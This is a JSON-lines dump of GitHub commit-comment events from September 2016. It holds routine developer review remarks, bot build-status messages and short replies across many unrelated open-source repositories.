{"id":"4542449953","type":"CommitCommentEvent","actor":{"login":"evs-chris"},"repo":{"name":"rollup/rollupjs.org"},"payload":{"comment":{"id":18969740,"position":null,"line":null,"path":null,"commit_id":"ba7abfa9da8755c3760c18d8bc74b2e7b978625d","created_at":"2016-09-09T21:13:42Z","updated_at":"2016-09-09T21:13:42Z","body":"Was just rolling some experimental stuff up and noticed the favicon doesn't match the new logo :smile:"}},"created_at":"2016-09-09T21:13:42Z"}
{"id":"4542450976","type":"CommitCommentEvent","actor":{"login":"alexanderbanks"},"repo":{"name":"joshuadeleon/typingclassifier"},"payload":{"comment":{"id":18969744,"position":null,"line":null,"path":null,"commit_id":"c2dbb0187339b391f021779626dbcb42426b47f2","created_at":"2016-09-09T21:13:54Z","updated_at":"2016-09-09T21:13:54Z","body":"You're right, this was a silly mistake."}},"created_at":"2016-09-09T21:13:54Z"}
{"id":"4542459009","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/mpmp"},"payload":{"comment":{"id":18969761,"position":null,"line":null,"path":null,"commit_id":"43a1eb7dda7770f8d36020848b55d052d4bf9d86","created_at":"2016-09-09T21:15:36Z","updated_at":"2016-09-09T21:15:36Z","body":"@leletec Look what I've found when I prepared the mpmp example of my paper."}},"created_at":"2016-09-09T21:15:36Z"}
{"id":"4542466742","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969782,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T21:17:17Z","updated_at":"2016-09-09T21:17:17Z","body":"Needless to say, it wasn't even easy to just make a new AndroidStudio project, copy everything in and make it work."}},"created_at":"2016-09-09T21:17:17Z"}
{"id":"4542469247","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969791,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T21:17:48Z","updated_at":"2016-09-09T21:17:48Z","body":"Interesting... I awkwardly use Ant to deal with the *yucky* Android stuff. If I had the time and the compassion, I'd build my own `mkfile` for Android."}},"created_at":"2016-09-09T21:17:48Z"}
{"id":"4542470633","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":18969793,"position":null,"line":null,"path":null,"commit_id":"97a22e24d72b31ab63fcc09f44d66b6d87bd8b8b","created_at":"2016-09-09T21:18:06Z","updated_at":"2016-09-09T21:18:06Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BGirKKkBTEeUzzoyLbwn-A"}},"created_at":"2016-09-09T21:18:06Z"}
{"id":"4542471855","type":"CommitCommentEvent","actor":{"login":"Timidger"},"repo":{"name":"Immington-Industries/way-cooler"},"payload":{"comment":{"id":18969802,"position":null,"line":null,"path":null,"commit_id":"dbb54d7159cc9eb91e61c0d466d424d715601bff","created_at":"2016-09-09T21:18:20Z","updated_at":"2016-09-09T21:18:20Z","body":"I don't think this message is accurate. All of those things are things we shouldn't test, excluding your code that exists in a mod.rs (which it really shouldn't). None of these should be removed because it doesn't make sense to test them. The only one that seems iffy is main, and if we do that we should split those functions up into other modules anyways"}},"created_at":"2016-09-09T21:18:20Z"}
{"id":"4542472795","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"okitec/mpmp"},"payload":{"comment":{"id":18969805,"position":null,"line":null,"path":null,"commit_id":"43a1eb7dda7770f8d36020848b55d052d4bf9d86","created_at":"2016-09-09T21:18:32Z","updated_at":"2016-09-09T21:18:32Z","body":"Oups :D"}},"created_at":"2016-09-09T21:18:32Z"}
{"id":"4542485634","type":"CommitCommentEvent","actor":{"login":"Dimatert9"},"repo":{"name":"alexandrage/EntFix"},"payload":{"comment":{"id":18969842,"position":5,"line":19,"path":"src/EntFix/ReflectFunctions.java","commit_id":"dd56072d276774d72439bc5b25e895acb09c13fb","created_at":"2016-09-09T21:21:13Z","updated_at":"2016-09-09T21:21:13Z","body":"NBTS.contains(\"run_command\") || NBTS.contains(\"open_file\") || NBTS.contains(\"open_url\") || NBTS.contains(\"suggest_command\") == \"ClickEvent\""}},"created_at":"2016-09-09T21:21:13Z"}
{"id":"4542486881","type":"CommitCommentEvent","actor":{"login":"elginsk8r"},"repo":{"name":"OpenDesireProject/android_device_htc_msm7x30-common"},"payload":{"comment":{"id":18969849,"position":null,"line":null,"path":null,"commit_id":"711b796d35e3a3098014e346a89db323d332dedd","created_at":"2016-09-09T21:21:30Z","updated_at":"2016-09-09T21:21:30Z","body":"it's supported just change the call to MALLOC_SVELTE := true"}},"created_at":"2016-09-09T21:21:30Z"}
{"id":"4542491751","type":"CommitCommentEvent","actor":{"login":"petermattis"},"repo":{"name":"jordanlewis/cockroach"},"payload":{"comment":{"id":18969865,"position":15,"line":604,"path":"storage/replica_raftstorage.go","commit_id":"2bbc11404edbcc0dfe4f9384555f422762cbc9a2","created_at":"2016-09-09T21:22:37Z","updated_at":"2016-09-09T21:22:37Z","body":"Well this is obviously crazy. Hard to diagnose how this helps without seeing the rest of your code and the test that is failing?"}},"created_at":"2016-09-09T21:22:37Z"}
{"id":"4542493217","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18969871,"position":null,"line":null,"path":null,"commit_id":"2ef682b4298e9b1eac5ccc0ec577e07116fc8c8c","created_at":"2016-09-09T21:22:57Z","updated_at":"2016-09-09T21:22:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Z_ExLOoyS9uIbj2pdlNT9g"}},"created_at":"2016-09-09T21:22:57Z"}
{"id":"4542493217","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18969871,"position":null,"line":null,"path":null,"commit_id":"2ef682b4298e9b1eac5ccc0ec577e07116fc8c8c","created_at":"2016-09-09T21:22:57Z","updated_at":"2016-09-09T21:22:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Z_ExLOoyS9uIbj2pdlNT9g"}},"created_at":"2016-09-09T21:22:57Z"}
{"id":"4542497106","type":"CommitCommentEvent","actor":{"login":"rcedwards"},"repo":{"name":"onevcat/Kingfisher"},"payload":{"comment":{"id":18969880,"position":241,"line":1962,"path":"Kingfisher.xcodeproj/project.pbxproj","commit_id":"dfda5b03406b3b1bd098d2c21c64c9ef3925fe6e","created_at":"2016-09-09T21:23:47Z","updated_at":"2016-09-09T21:23:47Z","body":"Changing the Code Signing here from \"iPhone Developer\" to an empty string will cause code signing issues when compiling this framework project as dependency.\r\n\r\nWas there any rational for changing this here?"}},"created_at":"2016-09-09T21:23:47Z"}
{"id":"4542497416","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969881,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T21:23:52Z","updated_at":"2016-09-09T21:23:52Z","body":"If you ever feel the need to do so, gimme a call ;)\r\n"}},"created_at":"2016-09-09T21:23:52Z"}
{"id":"4542497819","type":"CommitCommentEvent","actor":{"login":"schwers"},"repo":{"name":"reddit/node-middleware"},"payload":{"comment":{"id":18969882,"position":22,"line":87,"path":"Thunker.js","commit_id":"925e19f9e57faccec1845813ec8de099825dd6c3","created_at":"2016-09-09T21:23:56Z","updated_at":"2016-09-09T21:23:56Z","body":"🔕 I really wish we had TypeScript here so we could return _and_ resolve a union-type (pseudo code)\r\n```\r\ntype StateResolution = \r\n   case Succeeded(Any)\r\n   case Rejected(Any)\r\n;\r\n```\r\n\r\n"}},"created_at":"2016-09-09T21:23:56Z"}
{"id":"4542500962","type":"CommitCommentEvent","actor":{"login":"mellery451"},"repo":{"name":"seelabs/rippled"},"payload":{"comment":{"id":18969889,"position":8,"line":3,"path":"bin/getInfoRippled.sh","commit_id":"935580ea1b6467312c90565af3241de98410b72b","created_at":"2016-09-09T21:24:39Z","updated_at":"2016-09-09T21:24:39Z","body":"I think the export is still needed for the two variables declared before exec...although I guess it should be tested."}},"created_at":"2016-09-09T21:24:39Z"}
{"id":"4542504416","type":"CommitCommentEvent","actor":{"login":"scwhittle"},"repo":{"name":"google/upb"},"payload":{"comment":{"id":18969903,"position":null,"line":null,"path":null,"commit_id":"bb872be0c0e40a25b7529bce98643688a85b612e","created_at":"2016-09-09T21:25:25Z","updated_at":"2016-09-09T21:25:25Z","body":"LGTM"}},"created_at":"2016-09-09T21:25:25Z"}
{"id":"4542506523","type":"CommitCommentEvent","actor":{"login":"jordanlewis"},"repo":{"name":"jordanlewis/cockroach"},"payload":{"comment":{"id":18969907,"position":15,"line":604,"path":"storage/replica_raftstorage.go","commit_id":"2bbc11404edbcc0dfe4f9384555f422762cbc9a2","created_at":"2016-09-09T21:25:52Z","updated_at":"2016-09-09T21:25:52Z","body":"Whoops, I didn't realize this would notify you without making a pull\nrequest. Anyway, the rest of the code is in the parent commit. There are a\nfew tests that fail, including TestReserveAndApplySnapshot as a simple\nreproduction case.\n\nOn Fri, Sep 9, 2016, 17:22 Peter Mattis <notifications@github.com> wrote:\n\n> Well this is obviously crazy. Hard to diagnose how this helps without\n> seeing the rest of your code and the test that is failing?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jordanlewis/cockroach/commit/2bbc11404edbcc0dfe4f9384555f422762cbc9a2#commitcomment-18969865>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACrLZNq-EZjze-DMZcufeah638KvkGPks5qoc4dgaJpZM4J5dQB>\n> .\n>\n"}},"created_at":"2016-09-09T21:25:52Z"}
{"id":"4542506970","type":"CommitCommentEvent","actor":{"login":"ggm0118"},"repo":{"name":"xksmitty20/hackathon"},"payload":{"comment":{"id":18969908,"position":null,"line":null,"path":null,"commit_id":"d69ce2437f17375ec7dd790dbecf3308c6289d4b","created_at":"2016-09-09T21:25:58Z","updated_at":"2016-09-09T21:25:58Z","body":"L@@K I can see"}},"created_at":"2016-09-09T21:25:58Z"}
{"id":"4542508230","type":"CommitCommentEvent","actor":{"login":"gianluca-nitti"},"repo":{"name":"NeroReflex/Pizza"},"payload":{"comment":{"id":18969911,"position":37,"line":171,"path":"src/main/java/com/neroreflex/pizza/Trancio.java","commit_id":"372d97dc0504efb15d05e470168928c43d05b57b","created_at":"2016-09-09T21:26:14Z","updated_at":"2016-09-09T21:26:14Z","body":"@NeroReflex ho notato che l'aggiunta di questa riga causa un'InterruptedException nel plugin del forum. Infatti a quanto ho capito `interrupt()` non ferma effettivamente il thread ma setta solo un flag che viene rimosso quando il thread chiama `interrupted()` (fonte: https://docs.oracle.com/javase/tutorial/essential/concurrency/interrupt.html). Una volta eseguita questa riga quindi il ciclo while prosegue, e, durante l'onPoll, quando si arriva al `Thread.sleep(interval)` si ha InterruptedException perchè il thread è contrassegnato come \"interrotto\" ma in realtà sta ancora girando, e, a quanto pare, non lo si può far \"dormire\" quando si trova in questo stato."}},"created_at":"2016-09-09T21:26:14Z"}
{"id":"4542509983","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18969917,"position":88,"line":1389,"path":"js/client-chat.js","commit_id":"ada7385bb406b1e89e25037b5ab55f5bf625eeba","created_at":"2016-09-09T21:26:37Z","updated_at":"2016-09-09T21:26:37Z","body":"The logging changes were most likely unintended :/"}},"created_at":"2016-09-09T21:26:37Z"}
{"id":"4542516761","type":"CommitCommentEvent","actor":{"login":"iKarith"},"repo":{"name":"Landrash/pi-gen"},"payload":{"comment":{"id":18969943,"position":49,"line":70,"path":"README.md","commit_id":"275c29e66dedd74fe80debb8326362b4bac0fab5","created_at":"2016-09-09T21:28:12Z","updated_at":"2016-09-09T21:28:12Z","body":"I'd agree in part with this.  I was not specific here because of the \ntendency in Linux distributions to use highly specific names like \n\"Email Reader\" and \"Web Browser\" for programs nowadays.  While I do \nunderstand that (what's an orage and why would I ever want one?  \nAlso, where's the calendar program?), some of that does get a bit \nsilly.\n\nEven so, there are lots of tasks related to email, and claws-mail \ndoes only one of them.  More clarity there couldn't hurt, even if the \nspecific choice of claws-mail isn't important there so much as that \nthere is some tool.\n\nI'm still not convinced that the stage overview for Raspbian belongs \nin README.md.  I put it there because of README.md's sparisty and \nlack of anywhere better to put it.  But as that file becomes more \ncomplete with documentation about the tool, maybe a new location for \nthat information should be found or created--especially if the goal \nis to make pi-gen behave more the way Debian's much more complex live \nbuildsystem does separating the tool from the data.\n\nJoseph\n\nOn Thu, Sep 08, 2016 at 10:04:10PM -0700, Landrash wrote:\n>Email isn't really a specific package or program. Wouldn't it be better to be more specific ?\n>Could replace `email` with `claws-mail`.\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/Landrash/pi-gen/commit/275c29e66dedd74fe80debb8326362b4bac0fab5#commitcomment-18957785\n"}},"created_at":"2016-09-09T21:28:12Z"}
{"id":"4542517186","type":"CommitCommentEvent","actor":{"login":"volvofixthis"},"repo":{"name":"terrycain/razer-drivers"},"payload":{"comment":{"id":18969946,"position":7,"line":56,"path":"daemon/razer_daemon/dbus_services/dbus_methods/bw2013.py","commit_id":"cb601d55b3e70bf425a5e04f983416f42adec27d","created_at":"2016-09-09T21:28:17Z","updated_at":"2016-09-09T21:28:17Z","body":"Set starlight mode, maybe?"}},"created_at":"2016-09-09T21:28:17Z"}
{"id":"4542517240","type":"CommitCommentEvent","actor":{"login":"kylon"},"repo":{"name":"OpenDesireProject/android_device_htc_msm7x30-common"},"payload":{"comment":{"id":18969948,"position":null,"line":null,"path":null,"commit_id":"711b796d35e3a3098014e346a89db323d332dedd","created_at":"2016-09-09T21:28:18Z","updated_at":"2016-09-09T21:28:18Z","body":"Thanks\r\nI ll add it"}},"created_at":"2016-09-09T21:28:18Z"}
{"id":"4542521033","type":"CommitCommentEvent","actor":{"login":"seelabs"},"repo":{"name":"seelabs/rippled"},"payload":{"comment":{"id":18969967,"position":8,"line":3,"path":"bin/getInfoRippled.sh","commit_id":"935580ea1b6467312c90565af3241de98410b72b","created_at":"2016-09-09T21:29:12Z","updated_at":"2016-09-09T21:29:12Z","body":"Thanks @mellery451. Yeah, I've never seen that `exec 3` trick before so you might be right."}},"created_at":"2016-09-09T21:29:12Z"}
{"id":"4542521585","type":"CommitCommentEvent","actor":{"login":"electroduende21"},"repo":{"name":"numeroteca/valenciadata"},"payload":{"comment":{"id":18969971,"position":null,"line":null,"path":null,"commit_id":"90d6fa56141d42bbaa69a2c7760a5b7fa2bcbf8c","created_at":"2016-09-09T21:29:18Z","updated_at":"2016-09-09T21:29:18Z","body":"Es muy útil poder seleccionarlos todos.\r\nSe podría poner el gasto total de cada centro arriba a la izda del gráfico como se hace con las empresas suministradoras?"}},"created_at":"2016-09-09T21:29:18Z"}
{"id":"4542523840","type":"CommitCommentEvent","actor":{"login":"electroniceagle"},"repo":{"name":"nimbis/django-shop-richcatalog"},"payload":{"comment":{"id":18969982,"position":null,"line":null,"path":null,"commit_id":"58899170d2466ee0e5c3a1dcf884e521fcf764e1","created_at":"2016-09-09T21:29:48Z","updated_at":"2016-09-09T21:29:48Z","body":"There is a card for django-shop update.  \nhttps://trello.com/c/SSHEFYqU/761-move-to-recent-0-9-x-release-of-django-shop\n\tBrian Schott <https://www.linkedin.com/in/bfschott> ⋅ CTO ⋅ Nimbis Services ⋅ ph:443-274-6064 ⋅ fx:443-274-6060 ▪ \n\n\n> On Sep 9, 2016, at 2:53 PM, Eric Amador <notifications@github.com> wrote:\n> \n> Probably not for this problem specifically, but there should be one for replacing django-shop (which is one of the major things preventing us from moving past Django 1.8. In any case, I'll make sure one exists now. It was already the case that this app depended on Django<1.9, it just wasn't enforced by the setup.py\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nimbis/django-shop-richcatalog/commit/58899170d2466ee0e5c3a1dcf884e521fcf764e1#commitcomment-18967751>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AANYQhi4H_Izv1XBF1LsMQAhaFTgioYjks5qoasRgaJpZM4J5WNH>.\n> \n\n"}},"created_at":"2016-09-09T21:29:48Z"}
{"id":"4542525269","type":"CommitCommentEvent","actor":{"login":"yoe"},"repo":{"name":"josefbacik/nbd"},"payload":{"comment":{"id":18969988,"position":90,"line":1133,"path":"nbd-server.c","commit_id":"3135b8677efa31069e846d659398abf2e8827c67","created_at":"2016-09-09T21:30:11Z","updated_at":"2016-09-09T21:30:11Z","body":"`pipe()` is a function in `<unistd.h>` which we include. Might be a good idea to rename this, so as to avoid confusion?"}},"created_at":"2016-09-09T21:30:11Z"}
{"id":"4542525274","type":"CommitCommentEvent","actor":{"login":"yoe"},"repo":{"name":"josefbacik/nbd"},"payload":{"comment":{"id":18969989,"position":90,"line":1133,"path":"nbd-server.c","commit_id":"3135b8677efa31069e846d659398abf2e8827c67","created_at":"2016-09-09T21:30:11Z","updated_at":"2016-09-09T21:30:11Z","body":"`pipe()` is a function in `<unistd.h>` which we include. Might be a good idea to rename this, so as to avoid confusion?"}},"created_at":"2016-09-09T21:30:11Z"}
{"id":"4542526855","type":"CommitCommentEvent","actor":{"login":"subfuzion"},"repo":{"name":"appcelerator/amp"},"payload":{"comment":{"id":18969992,"position":1,"line":1,"path":"vendor/github.com/Shopify/sarama","commit_id":"91544d0119f3bdea42631a6931672fe78ded89ee","created_at":"2016-09-09T21:30:28Z","updated_at":"2016-09-09T21:30:28Z","body":"We don't want to commit subprojects (ie, git submodules), just source."}},"created_at":"2016-09-09T21:30:28Z"}
{"id":"4542531446","type":"CommitCommentEvent","actor":{"login":"tgmaxx"},"repo":{"name":"emoncms/graph"},"payload":{"comment":{"id":18970002,"position":null,"line":null,"path":null,"commit_id":"25635447a09ee048f6d87f2d53e148405137efc7","created_at":"2016-09-09T21:31:32Z","updated_at":"2016-09-09T21:31:32Z","body":"I have it working now. I had a graph from the prior commit versoin sitting in the MySQL table that apparently could not be deleted through emoncms. I went to phpMyadmin and deleted it, then restarted and now everything is fine. Works great and I am able to view graphs without being logged-in. Thanks!"}},"created_at":"2016-09-09T21:31:32Z"}
{"id":"4542531976","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18970006,"position":null,"line":null,"path":null,"commit_id":"fd2770a090ddecbe5be39cc6a5919b31ddbe1a0b","created_at":"2016-09-09T21:31:40Z","updated_at":"2016-09-09T21:31:40Z","body":"ohfinally"}},"created_at":"2016-09-09T21:31:40Z"}
{"id":"4542532428","type":"CommitCommentEvent","actor":{"login":"carlos980610"},"repo":{"name":"Caos625/Repositorio-python-1"},"payload":{"comment":{"id":18970008,"position":5,"line":3,"path":"MENU.py","commit_id":"e4561dd82d488a9c178df639a0bdfb84de707e22","created_at":"2016-09-09T21:31:46Z","updated_at":"2016-09-09T21:31:46Z","body":"prueba\r\n"}},"created_at":"2016-09-09T21:31:46Z"}
{"id":"4542533002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18970011,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T21:31:55Z","updated_at":"2016-09-09T21:31:55Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1499 of 1499 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.66%25-green.svg)</a>\n"}},"created_at":"2016-09-09T21:31:55Z"}
{"id":"4542533053","type":"CommitCommentEvent","actor":{"login":"aaronjorbin"},"repo":{"name":"WordPress/twentyseventeen"},"payload":{"comment":{"id":18970013,"position":null,"line":null,"path":null,"commit_id":"69482880b4ae2ec145f60df417423665581a5653","created_at":"2016-09-09T21:31:56Z","updated_at":"2016-09-09T21:31:56Z","body":"💥 "}},"created_at":"2016-09-09T21:31:56Z"}
{"id":"4542535459","type":"CommitCommentEvent","actor":{"login":"tmossey"},"repo":{"name":"aopp/android_packages_apps_Settings"},"payload":{"comment":{"id":18970025,"position":4,"line":102,"path":"src/com/android/settings/DeviceInfoSettings.java","commit_id":"7906e85eba7f19809200c8072fa93bb84170315a","created_at":"2016-09-09T21:32:29Z","updated_at":"2016-09-09T21:32:29Z","body":"this should be KEY_PWNIX_VERSION for consistency"}},"created_at":"2016-09-09T21:32:29Z"}
{"id":"4542539307","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":18970037,"position":14,"line":172,"path":"ltac/profile_ltac.ml","commit_id":"1f358573df98358237b9af2a3ff48c99d8be0686","created_at":"2016-09-09T21:33:24Z","updated_at":"2016-09-09T21:33:24Z","body":"It seems to me that putting the vbox here serves no particular purpose, but that the entire return value of `to_string` should be wrapped in some sort of box?"}},"created_at":"2016-09-09T21:33:24Z"}
{"id":"4542542263","type":"CommitCommentEvent","actor":{"login":"InternetUnexplorer"},"repo":{"name":"viluon/IVT-ConsoLOL"},"payload":{"comment":{"id":18970046,"position":null,"line":null,"path":null,"commit_id":"19d117fb23e906623ead23264f6ac00aa62a1de0","created_at":"2016-09-09T21:34:06Z","updated_at":"2016-09-09T21:34:06Z","body":"What."}},"created_at":"2016-09-09T21:34:06Z"}
{"id":"4542550307","type":"CommitCommentEvent","actor":{"login":"electroduende21"},"repo":{"name":"numeroteca/valenciadata"},"payload":{"comment":{"id":18970058,"position":null,"line":null,"path":null,"commit_id":"90d6fa56141d42bbaa69a2c7760a5b7fa2bcbf8c","created_at":"2016-09-09T21:35:58Z","updated_at":"2016-09-09T21:35:58Z","body":"se podría poner caja de texto para buscar en los suministradores/centro de gasto/descripción?\r\nDe esta forma se podrían visualizar el resto de empresas que permanecen \"ocultas\""}},"created_at":"2016-09-09T21:35:58Z"}
{"id":"4542552109","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18970059,"position":29,"line":67,"path":"otrv4.md","commit_id":"a3843e02bd4c2830189b53547c402ec8362db533","created_at":"2016-09-09T21:36:21Z","updated_at":"2016-09-09T21:36:21Z","body":"Doesn't this two paragraphs say the same thing that was explained in the overview? Should we move this to the overview if we feel is a better description of an off-the-record conversation?\r\nIf the title says \"security properties\", shouldn't this talk in terms of conversation and message deniability, non-malleability and the like?"}},"created_at":"2016-09-09T21:36:21Z"}
{"id":"4542554411","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18970070,"position":null,"line":null,"path":null,"commit_id":"bde16a61b4d86d154d0cf77f8d2cca3cbb0ecbad","created_at":"2016-09-09T21:36:51Z","updated_at":"2016-09-09T21:36:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UUPrkdluTuWJb189aYu2nQ"}},"created_at":"2016-09-09T21:36:51Z"}
{"id":"4542554697","type":"CommitCommentEvent","actor":{"login":"joshuadwire"},"repo":{"name":"joshuadwire/invoiceninja"},"payload":{"comment":{"id":18970071,"position":null,"line":null,"path":null,"commit_id":"ed07439de2546728e9d9fd9f67411d4281c20021","created_at":"2016-09-09T21:36:55Z","updated_at":"2016-09-09T21:36:55Z","body":"I've reverted this change because it allowed both GoCardless and Stripe to be configured to handle ACH at the same time."}},"created_at":"2016-09-09T21:36:55Z"}
{"id":"4542563112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18970103,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T21:38:46Z","updated_at":"2016-09-09T21:38:46Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T21:38:46Z"}
{"id":"4542565627","type":"CommitCommentEvent","actor":{"login":"gine78"},"repo":{"name":"pimatic/rfcontroljs"},"payload":{"comment":{"id":18970113,"position":5,"line":814,"path":"test/lib-controller.coffee","commit_id":"49130ea1768f9f8d0f54dc8603e346c160187c9f","created_at":"2016-09-09T21:39:21Z","updated_at":"2016-09-09T21:39:21Z","body":"i think, this is the problem. The pulslengths in the raw data are: `356, 720, 1524, 4692, 8672`"}},"created_at":"2016-09-09T21:39:21Z"}
{"id":"4542568859","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970122,"position":null,"line":null,"path":null,"commit_id":"d7a3aa59f4bfebfd145539efc5b65f3954faef1d","created_at":"2016-09-09T21:40:04Z","updated_at":"2016-09-09T21:40:04Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2309 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T21:40:04Z"}
{"id":"4542571817","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":18970131,"position":null,"line":null,"path":null,"commit_id":"aedc780f7016113b96a6117d51c52b24eabf6f2e","created_at":"2016-09-09T21:40:44Z","updated_at":"2016-09-09T21:40:44Z","body":"Is this a needed branch, and if so, when might we get this rebased to a new commit/pull?"}},"created_at":"2016-09-09T21:40:44Z"}
{"id":"4542576999","type":"CommitCommentEvent","actor":{"login":"mfcovington"},"repo":{"name":"jnmaloof/extract-utr"},"payload":{"comment":{"id":18970151,"position":null,"line":null,"path":null,"commit_id":"18e1e464617a8ae83db671e667187001056bb9cf","created_at":"2016-09-09T21:41:58Z","updated_at":"2016-09-09T21:41:58Z","body":"@jnmaloof Hey Julin, can you remind me what the issue was that this solved?"}},"created_at":"2016-09-09T21:41:58Z"}
{"id":"4542578394","type":"CommitCommentEvent","actor":{"login":"gunasper"},"repo":{"name":"gunasper/docs.stormwind"},"payload":{"comment":{"id":18970157,"position":null,"line":null,"path":null,"commit_id":"24709cca78aa1e2e672d05a48d553eae735c08e2","created_at":"2016-09-09T21:42:19Z","updated_at":"2016-09-09T21:42:19Z","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T21:42:19Z"}
{"id":"4542578556","type":"CommitCommentEvent","actor":{"login":"aboodmw"},"repo":{"name":"aboodmw/Hallo-World"},"payload":{"comment":{"id":18970158,"position":null,"line":null,"path":null,"commit_id":"c5ad985e6924d69fe563d0a9988dfdc8fa8c7732","created_at":"2016-09-09T21:42:21Z","updated_at":"2016-09-09T21:42:21Z","body":"master"}},"created_at":"2016-09-09T21:42:21Z"}
